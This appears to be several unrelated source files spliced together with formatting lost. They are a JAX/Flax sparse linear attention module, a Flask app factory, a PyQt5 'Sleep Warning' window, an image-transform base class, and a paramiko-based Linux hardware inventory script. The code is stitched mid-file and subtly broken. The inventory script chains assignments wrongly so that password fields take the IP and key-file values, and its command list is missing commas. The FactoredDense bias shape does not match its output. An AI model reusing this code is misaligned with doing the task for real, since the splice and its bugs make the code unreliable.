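    # [batch..., num_heads, features_per_head, length], writing the key/value
    # for decode step i reduces to cache += new_slice * one_hot(i, length)
    # (see update_cache_decode above), where new_slice has size 1 on the last
    # axis and broadcasts across it, so no scatter/gather is needed.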
swap_dims = lambda x: x[:-3] + tuple(x[i] for i in [-2, -1, -3]) cached_key = self.variable('cache', 'cached_key', jnp.zeros, swap_dims(key.shape), key.dtype) cached_value = self.variable('cache', 'cached_value', jnp.zeros, swap_dims(value.shape), value.dtype) cache_index = self.variable('cache', 'cache_index', lambda: jnp.array(0, dtype=jnp.int32)) rotary_index = cache_index.value if is_initialized: # Here we are in "apply()". *batch_dims, num_heads, features_per_head, length = ( cached_key.value.shape) if prefill: if prefill_lengths is None: # Figure out how far each element in the batch fills the cache based # on the mask. We index each element in the batch, the first head # dim (because this is always set to one), and the first query # vector. If there is any prefix at all, the first element in the # prefix would be part of it. raise NotImplementedError # TODO(tomprom) prefill_lengths = jnp.sum( mask[:, 0, 0, :], axis=-1).astype(cache_index.value.dtype) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_prefill( key, value, cached_key, cached_value, cache_index, prefill_lengths) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. elif decode: # Check the shape of the cached key against the input query. expected_shape = tuple(batch_dims) + (1, num_heads, features_per_head) if expected_shape != query.shape: raise ValueError('Autoregressive cache shape error, ' 'expected query shape %s instead got %s.' % (expected_shape, query.shape)) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_decode( key, value, cached_key, cached_value, cache_index) # NB: While decoding, we rely on a causal mask implementation in the # linear attention_fn # Currently, updating a variable inside of a method is not handled # in flax, so we return the actual values and assign them in the main # compacted call for now. # TODO: Move variable assignment inside of the # cache update functions once variable references are tracked across # transform boundaries. cache_index.value = cache_index_value cached_key.value = cached_key_value cached_value.value = cached_value_value # Mask the key and value with the attention mask if mask is not None: if mask.shape[1] > 1: key = jnp.einsum('...hl,...lhd->...lhd', mask, key) value = jnp.einsum('...hl,...lhd->...lhd', mask, value) else: key = jnp.einsum('...xl,...lhd->...lhd', mask, key) value = jnp.einsum('...xl,...lhd->...lhd', mask, value) dropout_rng = None if enable_dropout and self.dropout_rate > 0.: dropout_rng = self.make_rng('dropout') if self.use_rotary_embedding: # use rotary embeddings before attention # https://arxiv.org/abs/2104.09864 # TODO: Put it in a new class dim = query.shape[-1] max_length = max(query.shape[1], key.shape[1]) sin, cos = embedding.generate_fixed_pos_embedding( dim, max_length, max_timescale=self.rotary_embedding_max_timescale) query, key = embedding.apply_rotary_embedding( query, key, cos, sin, batch_size=inputs_q.shape[0], num_heads=self.num_heads, decode=decode, rotary_index=rotary_index) # Compute and apply attention (at the same time). 
if self.rescale_logits or self.use_extra_logit or self.float32_logits: # TODO: Implement these in FAVOR+ so they can be used here raise NotImplementedError if enable_dropout and self.dropout_rate > 0.: raise NotImplementedError x = self.attention_fn( query, key, value, broadcast_dropout=self.broadcast_dropout, # rescale_logits=self.rescale_logits, dropout_rng=dropout_rng, dropout_rate=self.dropout_rate, # enable_dropout=enable_dropout, dtype=self.dtype, precision=self.precision, # use_extra_logit=self.use_extra_logit, # float32_logits=self.float32_logits ) # pytype: disable=wrong-keyword-args if not self.output_projection: return x # Back to the original inputs dimensions. out = dense.DenseGeneral( features=features, axis=(-2, -1), kernel_init=self.kernel_init, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, kernel_axis_names=['heads', 'head_dim', 'embed'], name='out')( # pytype: disable=wrong-arg-types x) return out class FactoredDense(nn.Module): n_modules: int d_out: Optional[int] = None use_bias: bool = True use_bfloat16 = False @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True): r"""Returns a Dense-like layer, internally factored to use fewer parameters. This layer treats an activation vector as if divided into :math:`M` subvectors (``n_modules`` 'modules'). It uses this factored view to compute a :py:class:`Dense`-like mapping with high mixing/connectivity, but using approximately :math:`1/M` the number of weights of a similarly dimensioned :py:class:`Dense` layer. More specifically, each activation vector of dimensionality ``n_in`` is multiplied element-wise (a generalized form of gating) with ``n_modules`` vectors also of dimensionality ``n_in``. The resulting vectors are projected to the subvector/module dimensionality ``d_out / n_modules`` via a matrix multiply, and finally reshaped back to a single vector of dimensionality ``d_out``. Optionally, a bias vector of dimensionality ``d_out`` is added at the end. All the above-mentioned non-input objects -- gating vectors, projection matrix, and optional bias -- are trainable weights. Args: n_modules: Number by which an activation vector is divided into subvectors (modules) for the factored computation. d_in: Last/innermost dimension of input array. d_out: Last/innermost dimension of output array. use_bias: If True, add bias vectors at the end of the layer; else end the layer with the matrix multiply. use_bfloat16: If True, use bfloat16 weights; else use float32 weights. 
""" d_in = x.shape[-1] if self.d_out is None: d_out = d_in else: d_out = self.d_out if d_out % self.n_modules != 0: raise ValueError(f'Value d_out ({d_out}) must be a multiple of arg ' f'n_modules ({self.n_modules}).') d_module = d_out // self.n_modules gating = self.param('gating', flax.linen.initializers.normal(0.5), [self.n_modules, d_in], x.dtype) projection = self.param('projection', flax.linen.initializers.glorot_uniform(), [self.n_modules, d_in], x.dtype) x = jnp.einsum('...d,nd,dm->...nm', x, gating, projection) x = jnp.reshape(x, tuple(x.shape)[:-2] + (-1,)) if self.use_bias: bias = self.param('bias', flax.linen.initializers.normal(1e-6), [self.n_modules, d_in], x.dtype) x += bias return x class RememberPad(nn.Module): n_items_to_remember: int @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True): if self._n_items_to_remember == 0: return x if decode: raise NotImplementedError else: pad_widths = [[0, 0] for _ in range(len(x.shape))] pad_widths[1][0] = self.n_items_to_remember x = jnp.pad(x, pad_width=pad_widths, mode='constant') return x class LocallyConvDense(nn.Module): n_modules: int n_units: int kernel_size: int = 1 length_kernel_size: int = 1 @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True,): """Layer using local convolutions for approximation of Dense layer. The layer splits the last axis of a tensor into `n_modules`, then runs a convolution on all those modules, and concatenates their results. It is similar to LocallyConnectedDense above, but shares weights. Args: n_modules: Indicates how many modules (pixels) should be input and output split into for processing. n_units: how many outputs (filters) should each module generate. mode: One of `'train'`, `'eval'`, or `'predict'`. kernel_size: The size of the kernel to be used. length_kernel_size: If > 1, also do causal convolution on the previous axis, which is often the sentence length in sequence models. Returns: LocallyConvDense tl.Layer. """ if decode: # Prediction mode is not yet implemented for the convolution layer # It required "remembering" the last few tokens raise NotImplementedError if self.n_modules == 1: return dense.DenseGeneral(self.n_units) if self.kernel_size % 2 != 1: raise ValueError('Currently we only handle odd kernel sizes.') half = (self.kernel_size - 1) // 2 pad_widths = [[0, 0], [0, 0], [half, half], [0, 0]] x = jnp.reshape(x, tuple(x.shape)[:-1] + (self.n_modules, -1)) x = jnp.pad(x, pad_width=pad_widths, mode='constant') x = RememberPad(n_items_to_remember=self.length_kernel_size - 1)(x) x = nn.Conv(self.n_units, kernel_size=(self.length_kernel_size, self.kernel_size))(x) x = jnp.reshape(x, tuple(x.shape)[:-2] + (-1,)) return x class MultiHeadSparseLinearAttention(MultiHeadLinearAttention): """Multi-head linear attention with sparse QKV calculations. See: https://arxiv.org/abs/2111.12763 Attributes: num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1]) should be divisible by the number of heads. use_bias: bool: whether pointwise QKVO dense transforms use bias. dtype: the dtype of the computation (default: float32) qkv_features: dimension of the key, query, and value. head_dim: dimension of each head. If unspecified, it defaults to qkv_features // num_heads. out_features: dimension of the last projection broadcast_dropout: bool: use a broadcasted dropout along batch dims. dropout_rate: dropout rate precision: numerical precision of the computation see `jax.lax.Precision` for details. 
kernel_init: initializer for the kernel of the Dense layers. bias_init: initializer for the bias of the Dense layers. attention_fn: dot_product_attention or compatible function. Accepts query, key, value, and returns output of shape `[bs, dim1, dim2, ..., dimN,, num_heads, value_channels]`` use_extra_logit: whether to include a virtual extra logit equal to zero. float32_logits: bool, if True then compute logits in float32 to avoid numerical issues with bfloat16. output_projection: Project the output of `attention_fn` to `out_features`. If False, returns the output of `attention_fn` without a projection. split_head_kernel: whether to store QKVO variables with a split head dimension. kernels_to_fuse: Which kernels to fuse, if any. use_rotary_embedding: whether to use rotary embeddings. """ @nn.compact def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, bias: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True, prefill: bool = False, prefill_lengths: Optional[Array] = None) -> Array: """Applies multi-head dot product attention on the input data. Projects the inputs into multi-headed query, key, and value vectors, applies dot-product attention and project the results to an output vector. There are two modes: decoding and non-decoding (e.g., training). The mode is determined by `decode`. During decoding mode, this method is called twice, by `init` and `apply`. In the former, inputs_q: [batch..., length, qkv_features] and inputs_kv: [batch..., length, qkv_features] During apply, query, key and value all have the shape: [batch * beam, 1, qkv_features] where the batch dimension is added to include multiple beams. Note that the batch dimension is different during the init and apply calls. This is because the cached variables are directly passed-in during `apply` method. In other words, the cache variables such as `cached_key` are initialized with `batch` dim, expanded by tiling in the beam search function to `batch * beam` dimension, and passed to the `apply` method as part of a variable dict. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., {1, num_heads}, q_length, kv_length]`. bias: attention bias of shape `[batch_sizes..., num_heads, q_length, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. prefill: Whether to run a partial sequence to prefill the cache. prefill_lengths: The length of each partial sequence we are filling in the cache, lengths are inferred from the mask if not provided. Returns: If output_projection is True, then output of shape `[batch_sizes..., length, out_features]`, where out_features is set to features if not provided. If output_projection is False, then output of shape `[batch_sizes..., length, qkv_features]`, where qkv_features is set to features if not provided. 
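
    Example (a minimal non-decoding sketch; the constructor arguments and
    input names here are illustrative assumptions, not values from this
    codebase)::

      attn = MultiHeadSparseLinearAttention(num_heads=8, qkv_features=512)
      y, variables = attn.init_with_output(
          jax.random.PRNGKey(0), inputs_q, inputs_kv, enable_dropout=False)

    For autoregressive use, first make one call with `prefill=True` and a mask
    covering the inputs, then make per-step calls with `decode=True`, keeping
    the 'cache' variable collection mutable in `apply`.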
""" validate_linear_attention_call_parameter_shapes(inputs_q, inputs_kv, mask, bias, self.num_heads) if precomputed_qkv is not None: raise ValueError('Support for precomputed QKVO not implemented.') rotary_index = None features = self.out_features or inputs_q.shape[-1] qkv_features = self.qkv_features or inputs_q.shape[-1] if self.head_dim is None: head_dim = qkv_features // self.num_heads else: head_dim = self.head_dim if self.kernels_to_fuse: raise ValueError('Fused kernels are not supported with sparse attention') if self.kernels_to_fuse and not self.split_head_kernel: raise ValueError('Un-reshaped kernels are required when using QKV fused ' 'kernel optimization.') # Is attention logit rescaling explicit or folded into initializer? if self.rescale_logits: query_init = self.kernel_init else: if self.kernels_to_fuse: raise ValueError('Cannot fold in logit normalization to query ' 'initializer when using fused kernels.') depth_scaling = jnp.sqrt(head_dim).astype(self.dtype) query_init = lambda *args: self.kernel_init(*args) / depth_scaling make_dense = functools.partial( dense.DenseGeneral, axis=-1, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, ) # Project inputs_q to multi-headed q/k/v # dimensions are then [batch..., length, num_heads, features_per_head] query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) key = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='key')( inputs_kv) value = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='value')( inputs_kv) if self.sharding_over_head_dimension: query = activation_partitioning.with_sharding(query, 2) key = activation_partitioning.with_sharding(key, 2) value = activation_partitioning.with_sharding(value, 2) query: Array = query # hint to quiet pytype. key: Array = key value: Array = value if prefill and decode: raise ValueError('prefill and decode cannot both be true at the same' 'time. If you are using a prefix LM with bidirectional ' 'attention on the inputs, please make a call with ' 'prefill=True that includes an attention mask that ' 'covers your inputs first and then make your decoding ' 'calls.') if prefill or decode: # Detect if we're initializing by absence of existing cache data. is_initialized = self.has_variable('cache', 'cached_key') # The key and value have dimension # [batch..., length, num_heads, features_per_head], but we cache them as # [batch..., num_heads, features_per_head, length] as a TPU fusion # optimization. This also enable the "scatter via one-hot broadcast" # trick, which means we do a one-hot broadcast instead of a scatter/gather # operations, which gives a 3-4x speedup in practice. swap_dims = lambda x: x[:-3] + tuple(x[i] for i in [-2, -1, -3]) cached_key = self.variable('cache', 'cached_key', jnp.zeros, swap_dims(key.shape), key.dtype) cached_value = self.variable('cache', 'cached_value', jnp.zeros, swap_dims(value.shape), value.dtype) cache_index = self.variable('cache', 'cache_index', lambda: jnp.array(0, dtype=jnp.int32)) rotary_index = cache_index.value if is_initialized: # Here we are in "apply()". 
*batch_dims, num_heads, features_per_head, length = ( cached_key.value.shape) if prefill: if prefill_lengths is None: # Figure out how far each element in the batch fills the cache based # on the mask. We index each element in the batch, the first head # dim (because this is always set to one), and the first query # vector. If there is any prefix at all, the first element in the # prefix would be part of it. raise NotImplementedError # TODO(tomprom) prefill_lengths = jnp.sum( mask[:, 0, 0, :], axis=-1).astype(cache_index.value.dtype) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_prefill( key, value, cached_key, cached_value, cache_index, prefill_lengths) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. elif decode: # Check the shape of the cached key against the input query. expected_shape = tuple(batch_dims) + (1, num_heads, features_per_head) if expected_shape != query.shape: raise ValueError('Autoregressive cache shape error, ' 'expected query shape %s instead got %s.' % (expected_shape, query.shape)) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_decode( key, value, cached_key, cached_value, cache_index) # NB: While decoding, we rely on a causal mask implementation in the # linear attention_fn # Currently, updating a variable inside of a method is not handled # in flax, so we return the actual values and assign them in the main # compacted call for now. # TODO: Move variable assignment inside of the # cache update functions once variable references are tracked across # transform boundaries. cache_index.value = cache_index_value cached_key.value = cached_key_value cached_value.value = cached_value_value # Mask the key and value with the attention mask if mask is not None: if mask.shape[1] > 1: key = jnp.einsum('...hl,...lhd->...lhd', mask, key) value = jnp.einsum('...hl,...lhd->...lhd', mask, value) else: key = jnp.einsum('...xl,...lhd->...lhd', mask, key) value = jnp.einsum('...xl,...lhd->...lhd', mask, value) dropout_rng = None if enable_dropout and self.dropout_rate > 0.: dropout_rng = self.make_rng('dropout') if self.use_rotary_embedding: # use rotary embeddings before attention # https://arxiv.org/abs/2104.09864 # TODO: Put it in a new class dim = query.shape[-1] max_length = max(query.shape[1], key.shape[1]) sin, cos = embedding.generate_fixed_pos_embedding( dim, max_length, max_timescale=self.rotary_embedding_max_timescale) query, key = embedding.apply_rotary_embedding( query, key, cos, sin, batch_size=inputs_q.shape[0], num_heads=self.num_heads, decode=decode, rotary_index=rotary_index) # Compute and apply attention (at the same time). if self.rescale_logits or self.use_extra_logit or self.float32_logits: # TODO: Implement these in FAVOR+ so they can be used here raise NotImplementedError if enable_dropout and self.dropout_rate > 0.: raise NotImplementedError x = self.attention_fn( query, key, value, broadcast_dropout=self.broadcast_dropout, # rescale_logits=self.rescale_logits, dropout_rng=dropout_rng, dropout_rate=self.dropout_rate, # enable_dropout=enable_dropout, dtype=self.dtype, precision=self.precision, # use_extra_logit=self.use_extra_logit, # float32_logits=self.float32_logits ) # pytype: disable=wrong-keyword-args if not self.output_projection: return x # Back to the original inputs dimensions. 
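    # Illustrative shapes only: x here is [batch..., length, num_heads,
    # head_dim]; DenseGeneral with axis=(-2, -1) contracts the two trailing
    # axes, giving [batch..., length, features] where `features` is
    # out_features if provided, else the original embedding size.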
out = dense.DenseGeneral( features=features, axis=(-2, -1), kernel_init=self.kernel_init, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, kernel_axis_names=['heads', 'head_dim', 'embed'], name='out')( # pytype: disable=wrong-arg-types x) return out def validate_linear_attention_call_parameter_shapes(inputs_q: Array, inputs_kv: Array, mask: Optional[Array], bias: Optional[Array], num_heads: Optional[int]): """Validates the shapes of parameters to DenseAttention call methods.""" if inputs_q.ndim != inputs_kv.ndim: raise ValueError(f'Mismatched inputs rank: expected ' f'inputs_q.ndim ({inputs_q.ndim}) == ' f'inputs_kv.ndim ({inputs_kv.ndim})') if inputs_q.ndim < 3: raise ValueError(f'Expected rank of inputs >= 3, was {inputs_q.ndim}') if inputs_q.shape[:-3] != inputs_kv.shape[:-3]: raise ValueError(f'Mismatched batch dims: expected ' f'inputs_q.shape[:-3] ({inputs_q.shape[:-3]}) == ' f'inputs_kv.shape[:-3] ({inputs_kv.shape[:-3]})') if mask is not None: if mask.ndim != inputs_kv.ndim: raise ValueError(f'Mismatched ranks: expected ' f'mask.ndim ({mask.ndim}) to be equal to ' f'inputs_kv.ndim ({inputs_kv.ndim})') if num_heads is not None: if mask.shape[-2] not in (1, num_heads): raise ValueError(f'Mismatched num_heads: expected ' f'mask.shape[-2] ({mask.shape[-2]}) == ' f'num_heads ({num_heads}), or 1') else: num_heads = mask.shape[-2] if mask.shape[-1] != inputs_kv.shape[-2]: raise ValueError(f'Mismatched kv_length: expected ' f'mask.shape[-1] ({mask.shape[-1]}) == ' f'inputs_kv.shape[-2] ({inputs_kv.shape[-2]})') if bias is not None: raise ValueError('Bias must be None in linear attention.') 0 from flask import Flask from flask_sqlalchemy import SQLAlchemy from flask_jwt_extended import JWTManager from config import config db = SQLAlchemy() jwt = JWTManager() def create_app(env): app = Flask(__name__) app.config.from_object(config[env]) config[env].init_app(app) if app.config['SSL_REDIRECT']: from flask_sslify import SSLify sslify = SSLify(app) db.init_app(app) jwt.init_app(app) from .graphql import graphql as graphql_blueprint app.register_blueprint(graphql_blueprint, url_prefix='/api') return app from energyforecast import * from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import * from PyQt5.QtCore import * from PyQt5.QtWidgets import * class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(915, 600) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.camera_button = QtWidgets.QPushButton(self.centralwidget) self.camera_button.setGeometry(QtCore.QRect(30, 100, 200, 60)) self.video_button = QtWidgets.QPushButton(self.centralwidget) self.video_button.setGeometry(QtCore.QRect(30, 220, 200, 60)) self.about_button = QtWidgets.QPushButton(self.centralwidget) self.about_button.setGeometry(QtCore.QRect(30, 340, 200, 60)) self.exit_button = QtWidgets.QPushButton(self.centralwidget) self.exit_button.setGeometry(QtCore.QRect(30, 460, 200, 60)) self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(30, 10, 200, 60)) self.camera_label = QtWidgets.QLabel(self.centralwidget) self.camera_label.setGeometry(QtCore.QRect(250, 100, 640, 480)) self.score_label = QtWidgets.QLabel(self.centralwidget) self.score_label.setGeometry(QtCore.QRect(480, 30, 200, 60)) MainWindow.setCentralWidget(self.centralwidget) self.statusbar = QtWidgets.QStatusBar(MainWindow) 
self.statusbar.showMessage("By gorgeousdays") MainWindow.setStatusBar(self.statusbar) self.set_style(MainWindow) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def set_style(self,MainWindow): self.camera_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.video_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.about_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.exit_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.label.setAlignment(Qt.AlignCenter) self.label.setFont(QFont("Century",30,QFont.Bold)) pe = QPalette() pe.setColor(QPalette.WindowText,QColor(139,147, 194, 250)) self.label.setPalette(pe) self.score_label.setFont(QFont("Century",20,QFont.Bold)) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Sleep Warning")) self.camera_button.setText(_translate("MainWindow", "打开相机")) self.video_button.setText(_translate("MainWindow", "上传视频")) self.about_button.setText(_translate("MainWindow", "关于")) self.exit_button.setText(_translate("MainWindow", "退出")) self.label.setText(_translate("MainWindow", "MENU")) self.camera_label.setText(_translate("MainWindow", "请先打开摄像头")) self.score_label.setText(_translate("MainWindow", "Points")) import os import numbers import copy from abc import ABC, abstractmethod import torch from dmt.data.samples.sample import Sample from dmt.transforms.harmonizer import ImageHarmonizer from dmt.utils.parse import parse_bool, parse_probability from dmt.constants import ( INTERPOLATIONS_2_SITK_INTERPOLATIONS as interpolations_d ) class Transform(ABC): """ Abstract & base class for all image transforms. Implementation Structure: - all subclasses must define apply (opt. invertible) function - base class has parsing functions (input checking & processing) Transform inputs can be: 1. Raw Images: np.ndarray, torch.Tensor, PIL.Image, SimpleITK.Image 2. Containers: rere.Image Args: p: Probability that this transform will be applied. copy: Make a shallow copy of the input before applying the transform. include_keys: Key names in samples that will be transformed if they are images. exclude_keys: Key names in samples that will be ignored. """ ### ------ # Main API & Transformation Functionality # ----- ### def __init__(self, p=1.0, copy=True, include_keys=None, exclude_keys=None): self.p = parse_probability(p) self.copy = parse_bool(copy) keys = Sample._parse_include_exclude_keys(include_keys, exclude_keys) self.include_keys, self.exclude_keys = keys self.transform_args = () # for reproducibility; updated in subclasses def __call__(self, data, include_keys=None, exclude_keys=None): """ Handles functionality for all transforms: 1. 
Determine if transform should be applied given probability. 2. Standardize the image types given via a DataHarmonizer 3. Copy sample if necessary. 4. Transform the sample (rewrites new data to sample) 5. Record the transformation arguments into new sample. Args: data: Can be a Sample, Image, Harmonizer, Torch tensor, Numpy array, or SimpleITK Image. Returns: Transformed image(s) in the original type given. """ if torch.rand(1).item() > self.p: return data keys = include_keys, exclude_keys include_keys, exclude_keys = Sample._parse_include_exclude_keys(*keys) # overwrites keys specified in init if given here final_include_keys = self.include_keys if include_keys: final_include_keys = include_keys final_exclude_keys = self.exclude_keys if exclude_keys: final_exclude_keys = exclude_keys harmonizer = ImageHarmonizer(data) sample = harmonizer.get_sample() if self.copy: sample = copy.copy(sample) transformed_sample = self.apply_transform(sample) self._record_transform(transformed_sample) # convert to input type out_data = harmonizer.get_output(transformed_sample) return out_data @abstractmethod def apply_transform(self, sample): pass @property def name(self): return self.__class__.__name__ @property def is_invertible(self): return hasattr(self, 'invert') ### ------ # Transform Recording & Replication # ----- ### def _record_transform(self, transformed_sample): reproducing_args = self.get_reproducing_arguments() transformed_sample.record_transform(reproducing_args) def get_reproducing_arguments(self): """ Return a dictionary with the arguments that would be necessary to reproduce the transform exactly (arguments are from previous transform). """ reproducing_arguments = { 'name': self.name, 'include_keys': self.include_keys, 'exclude_keys': self.exclude_keys, 'copy': self.copy, 'p': self.p } t_args = {name: getattr(self, name) for name in self.transform_args} reproducing_arguments.update(t_args) return reproducing_arguments module_linux.py import os import ast import math import paramiko commands = ['cat /dev/null', 'dmidecode -V', 'fdisk -V', 'find --version', 'grep -V', 'hdparm -V', 'hostname', 'id', 'ifconfig -V', 'ip -V', 'lshal -V' 'python2 -h', 'python3 -V', 'sort --version' 'sudo -V', 'wc --version'] class GetLinuxData: def __init__(self, base_url, username, secret, ip, ssh_port, timeout, usr, pwd, use_key_file, key_file, get_serial_info, add_hdd_as_device_properties, add_hdd_as_parts, add_nic_as_parts, get_hardware_info, get_os_details, get_cpu_info, get_memory_info, ignore_domain, ignore_virtual_machines, upload_ipv6, give_hostname_precedence, debug): self.d42_api_url = base_url self.d42_username = username self.d42_password = self.machine_name = ip self.port = int(ssh_port) self.timeout = timeout self.username = usr self.password = self.use_key_file = use_key_file self.key_file = key_file self.get_serial_info = get_serial_info self.get_hardware_info = get_hardware_info self.get_os_details = get_os_details self.get_cpu_info = get_cpu_info self.get_memory_info = get_memory_info self.ignore_domain = ignore_domain self.ignore_virtual_machines = ignore_virtual_machines self.upload_ipv6 = upload_ipv6 self.name_precedence = give_hostname_precedence self.add_hdd_as_devp = add_hdd_as_device_properties self.add_hdd_as_devp = False # do not edit, take a look at the inventory.config.example for details self.add_hdd_as_parts = add_hdd_as_parts self.add_nic_as_parts = add_nic_as_parts self.debug = debug self.root = True self.devicename = None self.disk_sizes = {} self.raids = {} self.hdd_parts = [] 
self.nic_parts = [] self.device_name = None self.os = None self.paths = {} self.nics = [] self.alldata = [] self.devargs = {} self.ssh = paramiko.SSHClient() self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) def main(self): self.connect() self.get_cmd_paths() self.are_u_root() if self.add_nic_as_parts: self.nic_parts = self.get_physical_nics() self.alldata.append(self.nic_parts) dtype = self.get_system() if dtype == 'virtual' and self.ignore_virtual_machines: return self.alldata if self.get_memory_info: self.get_ram() if self.get_cpu_info: self.get_cpu() if self.get_os_details: self.get_os() self.get_hdd() self.get_ip_ipaddr() self.get_ip_ipmi() self.alldata.append(self.devargs) if self.add_hdd_as_parts: self.alldata.append({'hdd_parts': self.hdd_parts}) if self.add_nic_as_parts: self.alldata.append({'nic_parts': self.nic_parts}) return self.alldata def connect(self): try: if not self.use_key_file: self.ssh.connect(str(self.machine_name), port=self.port, username=self.username, password=self.password, timeout=self.timeout) else: self.ssh.connect(str(self.machine_name), port=self.port, username=self.username, key_filename=self.key_file, timeout=self.timeout) except paramiko.AuthenticationException: print str(self.machine_name) + ': authentication failed' return None except Exception as err: print str(self.machine_name) + ': ' + str(err) return None def get_cmd_paths(self): search_paths = ['/usr/bin', '/bin', '/usr/local/bin', '/sbin', '/usr/sbin', '/usr/local/sbin'] for cmd_to_find in commands: for search_path in search_paths: cmd_path = "%s/%s" % (search_path, cmd_to_find) data_out, data_err = self.execute(cmd_path, False) if not data_err: self.paths.update({cmd_to_find.split()[0]: search_path}) break if 'command not found' in data_err: if self.debug: print '\t[-] Failed to find command "%s" at path "%s"' % (cmd_to_find, search_path) def find_command_path(self, cmd_to_find): search_paths = ['/usr/bin', '/bin', '/usr/local/bin', '/sbin', '/usr/sbin', '/usr/local/sbin'] for search_path in search_paths: cmd_path = "%s/%s" % (search_path, cmd_to_find) data_out, data_err = self.execute(cmd_path, False) if not data_err: self.paths.update({cmd_to_find:search_path}) return search_path if 'command not found' in data_err: if self.debug: print '\t[-] Failed to find command "%s" at path "%s"' % (cmd_to_find, search_path) def execute(self, cmd, needroot=False): if needroot: if self.root: stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) else: if 'sudo' in self.paths: cmd_sudo = "%s/sudo -S -p '' %s" % (self.paths['sudo'],cmd) cmd_sudo = "sudo -S -p '' %s" % cmd stdin, stdout, stderr = self.ssh.exec_command(cmd_sudo, timeout=30) stdin.write('%s\n' % self.password) stdin.flush() else: stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) data_err = stderr.readlines() try: data_out = stdout.readlines() except UnicodeDecodeError: data_x = stdout.read() data_out = data_x.split('\n') if data_err and 'sudo: command not found' in str(data_err): stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) data_err = stderr.readlines() data_out = stdout.readlines() return data_out, data_err def are_u_root(self): if 'id' in self.paths: cmd = '%s/id -u' % self.paths['id'] else: cmd = 'id -u' data, err = self.execute(cmd) if data[0].strip() == '0': self.root = True else: self.root = False @staticmethod def to_ascii(s): try: return s.encode('ascii', 'ignore') except Exception as err: print '[?] 
to_ascii exception: ' + str(err) return None @staticmethod def closest_memory_assumption(v): if v < 512: v = 128 * math.ceil(v / 128.0) elif v < 1024: v = 256 * math.ceil(v / 256.0) elif v < 4096: v = 512 * math.ceil(v / 512.0) elif v < 8192: v = 1024 * math.ceil(v / 1024.0) else: v = 2048 * math.ceil(v / 2048.0) return int(v) def get_name(self): if 'hostname' in self.paths: cmd = '%s/hostname' % self.paths['hostname'] else: cmd = 'hostname' data_out, data_err = self.execute(cmd) device_name = None if not data_err: if self.ignore_domain: device_name = self.to_ascii(data_out[0].rstrip()).split('.')[0] else: device_name = self.to_ascii(data_out[0].rstrip()) if device_name != '': self.devargs.update({'name': device_name}) if self.name_precedence: self.devargs.update({'new_name': device_name}) return device_name return device_name def get_system(self): self.device_name = self.get_name() if self.device_name not in ('', None): if 'dmidecode' in self.paths: cmd = '%s/dmidecode -t system' % self.paths['dmidecode'] else: cmd = 'dmidecode -t system' data_out, data_err = self.execute(cmd, True) if not data_err: dev_type = None for rec in data_out: if rec.strip() not in ('\n', ' ', '', None): rec = rec.strip() if rec.startswith('Manufacturer:'): manufacturer = rec.split(':')[1].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if 